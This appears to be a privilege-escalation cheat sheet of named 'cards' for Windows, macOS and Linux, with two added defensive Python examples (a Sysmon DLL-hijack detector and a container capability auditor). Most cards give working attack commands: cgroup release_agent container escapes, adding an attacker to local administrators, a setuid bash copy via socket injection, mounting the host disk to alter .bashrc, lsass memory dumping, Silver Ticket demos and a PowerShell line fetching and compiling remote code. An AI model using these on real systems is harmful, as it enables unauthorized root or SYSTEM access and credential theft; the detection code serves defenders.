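The magnify.exe and CDPSvc cards above are the same weakness seen twice: a SYSTEM process resolves a DLL through the search order and finds it in a directory on the system PATH that ordinary users can write to. The detection below is an added example, not the document's own code. It assumes Sysmon Event ID 7 (Image loaded) records exported as dicts with Sysmon's field names (Image, ImageLoaded, Signed, User; the User field exists only in recent Sysmon releases) and treats a load from outside the Windows and Program Files trees by a process that does not live in that same directory as the signal. The events are constructed.

```python
"""Detect SYSTEM processes loading DLLs from untrusted directories (search-order hijacks).

Added example for this page; not the document's own code. Assumes Sysmon Event ID 7
records as dicts with Sysmon field names; SAMPLE_EVENTS is constructed.
"""
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
SYSTEM_USERS = {"nt authority\\system"}


def load_findings(event):
    """Reasons a Sysmon image-load event is suspicious; [] when nothing stands out."""
    if event.get("EventID") != 7:
        return []
    loaded = event.get("ImageLoaded", "").lower()
    image = event.get("Image", "").lower()
    if loaded.startswith(TRUSTED_ROOTS):
        return []
    # An application loading its own DLLs from its install directory is ordinary.
    image_dir = image.rsplit("\\", 1)[0] + "\\"
    if loaded.startswith(image_dir):
        return []
    reasons = [f"module loaded from outside trusted install roots: {event.get('ImageLoaded')}"]
    if str(event.get("Signed", "")).lower() != "true":
        reasons.append("module is unsigned")
    if event.get("User", "").lower() in SYSTEM_USERS:
        reasons.append(f"{event.get('Image')} runs as SYSTEM, so the module's code does too")
    return reasons


def hijack_candidates(events):
    """[(loading image, loaded module, reasons)] for every event that trips the rule."""
    out = []
    for ev in events:
        reasons = load_findings(ev)
        if reasons:
            out.append((ev.get("Image"), ev.get("ImageLoaded"), reasons))
    return out


# Constructed events: a normal service DLL, the two hijacks from the cards, and a
# Python interpreter loading its own runtime from the same writable directory.
SAMPLE_EVENTS = [
    {"EventID": 7, "Image": r"C:\Windows\System32\svchost.exe",
     "ImageLoaded": r"C:\Windows\System32\cdpsvc.dll", "Signed": "true",
     "User": r"NT AUTHORITY\SYSTEM"},
    {"EventID": 7, "Image": r"C:\Windows\System32\svchost.exe",
     "ImageLoaded": r"C:\python27\cdpsgshims.dll", "Signed": "false",
     "User": r"NT AUTHORITY\SYSTEM"},
    {"EventID": 7, "Image": r"C:\Windows\System32\magnify.exe",
     "ImageLoaded": r"C:\python27\igdgmm64.dll", "Signed": "false",
     "User": r"NT AUTHORITY\SYSTEM"},
    {"EventID": 7, "Image": r"C:\python27\python.exe",
     "ImageLoaded": r"C:\python27\python27.dll", "Signed": "false",
     "User": r"CORP\user"},
    {"EventID": 1, "Image": r"C:\python27\python.exe"},
]

if __name__ == "__main__":
    for image, module, reasons in hijack_candidates(SAMPLE_EVENTS):
        print(image, "loaded", module, "->", "; ".join(reasons))
```

The preventive fix is the one the cards' own first step reveals: no directory on the machine-wide PATH may be writable by non-administrators (`icacls` each entry and remove Users/Everyone write rights), and installers that append their own directory to the system PATH should be reviewed for exactly that.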


HIVENIGHTMARE

Domain: Yes
Local Admin: Yes
OS: Windows
Type: 0/1 Exploit
Difficulty:
APT Used:
Detection:

    HiveNightmare.exe 200


CVE-2021-30655

Domain: No
Local Admin: Yes
OS: Mac
Type: 0/1 Exploit
Difficulty:
APT Used:
Detection:

    https://github.com/thehappydinoa/rootOS
    python rootOS.py


CVE-2019-8526

Domain: No
Local Admin: Yes
OS: Mac
Type: 0/1 Exploit
Difficulty:
APT Used:
Detection:

    https://github.com/amanszpapaya/MacPer
    python main.py


CVE-2020-9771

Domain: No
Local Admin: Yes
OS: Mac
Type: 0/1 Exploit
Difficulty:
APT Used:
Detection:

    https://github.com/amanszpapaya/MacPer
    python main.py


CVE-2021-3156

Domain: No
Local Admin: Yes
OS: Mac
Type: 0/1 Exploit
Difficulty:
APT Used:
Detection:

    https://github.com/amanszpapaya/MacPer
    python main.py


CVE-2018-4280

Domain: No
Local Admin: Yes
OS: Mac
Type: 0/1 Exploit
Difficulty:
APT Used:
Detection:

    https://github.com/bazad/launchd-portrep
    ./launchd-portrep 'touch /tmp/exploit-success'


ABUSING WITH FILERESTOREPRIVILEGE

Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Difficulty:
APT Used:
Detection:

    poptoke.exe


ABUSING WITH RESTOREANDBACKUPPRIVILEGES

Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Difficulty:
APT Used:
Detection:

    poptoke.exe


ABUSING WITH SHADOWCOPYBACKUPPRIVILEGE

Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Difficulty:
APT Used:
Detection:

    poptoke.exe


ABUSING WITH SHADOWCOPY

Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Difficulty:
APT Used:
Detection:

    poptoke.exe


DYNAMIC PHISHING

Domain: Y/N
Local Admin: Yes
OS: Mac
Type: Phish
Difficulty:
APT Used:
Detection:

    https://github.com/thehappydinoa/rootOS
    python rootOS.py


RACE CONDITIONS

Domain: No
Local Admin: Yes
OS: Windows
Type: Race Condition
Difficulty:
APT Used:
Detection:

    echo "net localgroup administrators attacker /add" > C:\temp\not-evil.bat
    tempracer.exe C:\temp\*.bat


ABUSING USERMODE HELPER API

Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing Capabilities
Difficulty:
APT Used:
Detection:

    d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
    mkdir -p $d/w; echo 1 > $d/w/notify_on_release
    t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
    touch /o; echo $t/c > $d/release_agent
    echo "#!/bin/sh" > /c
    echo "ps > $t/o" >> /c
    chmod +x /c
    sh -c "echo 0 > $d/w/cgroup.procs"; sleep 1
    cat /o


ESCAPE ONLY WITH CAP_SYS_ADMIN CAPABILITY

Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing Capabilities
Difficulty:
APT Used:
Detection:

    mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
    echo 1 > /tmp/cgrp/x/notify_on_release
    host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
    echo "$host_path/cmd" > /tmp/cgrp/release_agent
    echo "#!/bin/sh" > /cmd
    echo "ps aux > $host_path/output" >> /cmd
    chmod a+x /cmd
    sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
    cat /output
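Both cgroup release_agent cards above (the usermode-helper variant and the CAP_SYS_ADMIN-only variant) need a container whose effective capability set includes CAP_SYS_ADMIN, which the default Docker profile does not grant. The first thing to check on a suspect container is therefore the capability masks in `/proc/<pid>/status`. The decoder below is an added example, not the document's own code; the bit numbers follow linux/capability.h, and the two status excerpts are constructed (one with the default Docker set, one with a fully privileged set).

```python
"""Decode CapInh/CapPrm/CapEff/CapBnd/CapAmb masks from /proc/<pid>/status and report
the capabilities that make container escapes such as the release_agent trick possible.

Added example for this page; not the document's own code. Bit numbers are from
linux/capability.h; the status excerpts are constructed.
"""
CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER", "CAP_FSETID",
    "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP", "CAP_LINUX_IMMUTABLE",
    "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST", "CAP_NET_ADMIN", "CAP_NET_RAW",
    "CAP_IPC_LOCK", "CAP_IPC_OWNER", "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT",
    "CAP_SYS_PTRACE", "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD", "CAP_LEASE",
    "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP", "CAP_MAC_OVERRIDE",
    "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM", "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ",
    "CAP_PERFMON", "CAP_BPF", "CAP_CHECKPOINT_RESTORE",
]
# Capabilities that give a container process a route to the host (mount/cgroup control,
# kernel modules, raw device and memory access, ptrace of host processes, eBPF).
ESCAPE_CAPS = {"CAP_SYS_ADMIN", "CAP_SYS_MODULE", "CAP_SYS_PTRACE", "CAP_SYS_RAWIO",
               "CAP_DAC_READ_SEARCH", "CAP_NET_ADMIN", "CAP_BPF", "CAP_PERFMON"}


def decode_cap_mask(hex_mask):
    """'00000000a80425fb' -> list of capability names whose bit is set."""
    mask = int(hex_mask, 16)
    return [name for bit, name in enumerate(CAP_NAMES) if (mask >> bit) & 1]


def parse_proc_status(text):
    """Return {'CapInh': [...], 'CapPrm': [...], 'CapEff': [...], 'CapBnd': [...], 'CapAmb': [...]}."""
    caps = {}
    for line in text.splitlines():
        if line.startswith("Cap") and ":" in line:
            key, value = line.split(":", 1)
            caps[key.strip()] = decode_cap_mask(value.strip())
    return caps


def audit_proc_status(text):
    """Sorted list of escape-relevant capabilities in the effective set ([] is the good case)."""
    caps = parse_proc_status(text)
    return sorted(set(caps.get("CapEff", [])) & ESCAPE_CAPS)


# Constructed excerpts of /proc/self/status from inside a container.
SAMPLE_DEFAULT_CONTAINER = """\
Name:\tsh
CapInh:\t0000000000000000
CapPrm:\t00000000a80425fb
CapEff:\t00000000a80425fb
CapBnd:\t00000000a80425fb
CapAmb:\t0000000000000000
"""
SAMPLE_PRIVILEGED = """\
Name:\tsh
CapInh:\t0000000000000000
CapPrm:\t000001ffffffffff
CapEff:\t000001ffffffffff
CapBnd:\t000001ffffffffff
CapAmb:\t0000000000000000
"""

if __name__ == "__main__":
    for label, text in (("default", SAMPLE_DEFAULT_CONTAINER), ("privileged", SAMPLE_PRIVILEGED)):
        print(label, "effective:", ", ".join(parse_proc_status(text)["CapEff"]))
        print(label, "escape-relevant:", audit_proc_status(text) or "none")
```

The default mask decodes to the fourteen capabilities Docker grants by default, none of which is on the escape list; a process that shows CAP_SYS_ADMIN there was started with `--privileged` or an explicit `--cap-add`, and the cgroup tricks above need exactly that (plus a writable cgroup mount, which is why running with `--security-opt no-new-privileges` and a read-only root filesystem is the usual complement).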


ABUSING EXPOSED HOST DIRECTORIES

Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing Capabilities
Difficulty:
APT Used:
Detection:

    mknod /dev/sdb1 block 8 17
    mkdir /mnt/host_home
    mount /dev/sdb1 /mnt/host_home
    echo 'echo "Hello from container land!" 2>&1' >> /mnt/host_home/eric_chiang_m/.bashrc


UNIX WILDCARD

Domain: No
Local Admin: Yes
OS: Linux
Type: Injection
Difficulty:
APT Used:
Detection:

    python wildpwn.py --file /tmp/very_secret_file combined ./pwn_me/


SOCKET COMMAND INJECTION

Domain: No
Local Admin: Yes
OS: Linux
Type: Injection
Difficulty:
APT Used:
Detection:

    echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash; chmod +x /tmp/bash;" | socat - UNIX-CLIENT:/tmp/socket_test.s


LOGSTASH

Domain: No
Local Admin: Yes
OS: Linux
Type: Injection
Difficulty:
APT Used:
Detection:

    /etc/logstash/logstash.yml
    input {
      exec {
        command => "whoami"
        interval => 120
      }
    }


USODLLLOADER

Domain: No
Local Admin: Yes
OS: Linux
Type: Injection
Difficulty:
APT Used:
Detection:

    UsoDllLoader.exe


Trend Chain Methods for Privilege Escalation


HABANERO CHILLI

Domain: No
Local Admin: Yes
OS: Windows
Type: DLL Side-loading

    rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump


PADRON CHILLI

Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Create a reflective DLL injector + reflective DLL to dump lsass memory without touching the disk

    # .\inject.x64.exe <Path to reflective dll: .\LsassDumpReflectiveDLL.dll>


JALAPENO CHILLIES

Domain: Yes
Local Admin: Yes
OS: Windows
Type: Unhook NTDLL.dll + dump lsass.exe as WindowsUpdateProvider.pod

    NihilistGuy.exe


PASILLA CHILI

Domain: Yes
Local Admin: Yes
OS: Windows
Type: SeImpersonatePrivilege + Abusing Service Account Session

    https://github.com/tyranid/blackhat-usa-2022-demos
    Demo5.ps1


FINGER CHILLI

Domain: No
Local Admin: Yes
OS: Windows
Type: Abusing PrintNotify Service + DLL side-loading

    As an administrator, copy winspool.drv and mod-ms-win-core-apiquery-l1-1-0.dll to C:\Windows\System32\spool\drivers\x64\3\.
    Place all files included in /bin/ into the same directory.
    Then run: powershell . .\spooltrigger.ps1
    You get a shell as NT AUTHORITY\SYSTEM.


ORANGE CAYENNE

Domain: Yes
Local Admin: Yes
OS: Windows
Type: Silver Ticket + I Know

    https://github.com/tyranid/blackhat-usa-2022-demos
    Demo1.ps1


RED CAYENNE

Domain: Yes
Local Admin: Yes
OS: Windows
Type: Silver Ticket + User to User Authentication

    https://github.com/tyranid/blackhat-usa-2022-demos
    demo2.ps1


BIRDS EYE CHILLI

Domain: Yes
Local Admin: Yes
OS: Windows
Type: Silver Ticket + Buffer Type Confusion

    https://github.com/tyranid/blackhat-usa-2022-demos
    Demo3.ps1


SCOTCH BONNET

Domain: Yes
Local Admin: Yes
OS: Windows
Type: Bring Your Own KDC

    https://github.com/tyranid/blackhat-usa-2022-demos
    Demo4.ps1


LEMON HABANERO

Domain: Yes
Local Admin: Yes
OS: Linux
Type: Environment Capabilities

    gcc -Wl,--no-as-needed -lcap-ng -o ambient ambient.c
    sudo setcap cap_setpcap,cap_net_raw,cap_net_admin,cap_sys_nice+eip ambient
    ./ambient /bin/bash


RED HABANERO

Domain: No
Local Admin: Yes
OS: Windows
Type: NtSetInformationProcess + DLL side-loading

    BypassRtlSetProcessIsCritical.exe pid


GHOST PEPPER

Domain: No
Local Admin: Yes
OS: Windows
Type: Directory-Deletion + Windows Media Player d/s

    https://github.com/sailay1996/delete2SYSTEM
    .\poc.ps1


CHOCOLATE SCORPION CHILLI

Domain: No
Local Admin: Yes
OS: Windows
Type: Allow low-privileged user accounts to create file system and registry symbolic links

    PS C:\> $code = (iwr https://raw.githubusercontent.com/usdAG/SharpLink/main/SharpLink.cs).content
    PS C:\> Add-Type $code
    PS C:\> $s = New-Object de.usd.SharpLink.Symlink("C:\Users\Public\Example\link", "C:\ProgramData\target.txt")
    PS C:\> $s.Open()
    PS C:\> echo "Hello World :D" > C:\Users\Public\Example\link
    PS C:\> type C:\ProgramData\target.txt
    Hello World :D
    PS C:\> $s.Close()


CAROLINA REAPER

Domain: Yes
Local Admin: Yes
OS: Windows
Type: Creates an arbitrary service + PTH

    https://github.com/tyranid/blackhat-usa-2022-demos
    Demo6.ps1


THE INTIMIDATOR CHILLI

Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Manipulate memory/process token values/NT system calls and objects/NT object manager

    https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools
    Import-Module NtObjectManager
    Get-ChildItem NtObject:\
    NT*



